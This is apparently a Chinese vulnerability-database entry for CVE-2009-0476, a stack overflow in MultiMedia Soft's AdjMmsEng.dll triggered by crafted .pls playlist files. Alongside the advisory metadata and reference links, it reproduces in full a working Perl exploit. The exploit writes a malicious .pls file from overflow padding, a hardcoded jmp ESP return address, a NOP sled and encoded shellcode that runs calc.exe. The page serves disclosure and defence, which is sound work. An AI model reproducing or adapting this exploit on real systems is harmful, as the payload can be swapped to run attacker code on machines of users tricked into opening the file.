MultiMedia Soft多个组件AdjMmsEng.dll PLS文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117337 漏洞类型 缓冲区溢出
发布时间 2009-02-03 更新时间 2009-02-12
CVE编号 CVE-2009-0476 CNNVD-ID CNNVD-200902-154
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7958
https://cxsecurity.com/issue/WLB-2009020144
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-154
|漏洞详情
MultiMediaSoft是一家意大利公司,为Windows开发各种多媒体软件组件和应用。MultiMediaSoft为多个.NET音频组件提供了AdjMmsEng.dll,该库在处理*.pls播放列表文件时存在栈溢出漏洞。如果用户受骗打开了特制的*.pls文件就会触发这个溢出,导致执行任意代码。
|漏洞EXP
#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : h4ck3r#47
# Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
# Tested in Windows Pro Sp3 (English)
# Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All arab4services.net and friends
#-----------------------------------------------------------------------------
my $overflow = "\x41" x 1324;
my $ret = "\x7B\x46\x86\x7C"; # jmp ESP from kernel32.dll in Windows pro Sp3
my $nop = "\x90" x 100 ;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
my $shellcode =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
"\x51\x92\x42\x83";

my $file="hx.pls";

$exploit = $overflow.$ret.$nop.$shellcode;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "Done \n";

# milw0rm.com [2009-02-03]
|参考资料

来源:BID
名称:33589
链接:http://www.securityfocus.com/bid/33589
来源:BUGTRAQ
名称:20090203EuphonicsAudioPlayerv1.0(.pls)LocalBOFPOC
链接:http://www.securityfocus.com/archive/1/archive/1/500652/100/0/threaded
来源:MILW0RM
名称:7974
链接:http://www.milw0rm.com/exploits/7974
来源:MILW0RM
名称:7973
链接:http://www.milw0rm.com/exploits/7973
来源:MILW0RM
名称:7958
链接:http://www.milw0rm.com/exploits/7958
来源:VUPEN
名称:ADV-2009-0316
链接:http://www.frsirt.com/english/advisories/2009/0316
来源:SECUNIA
名称:33817
链接:http://secunia.com/advisories/33817
来源:SECUNIA
名称:33791
链接:http://secunia.com/advisories/33791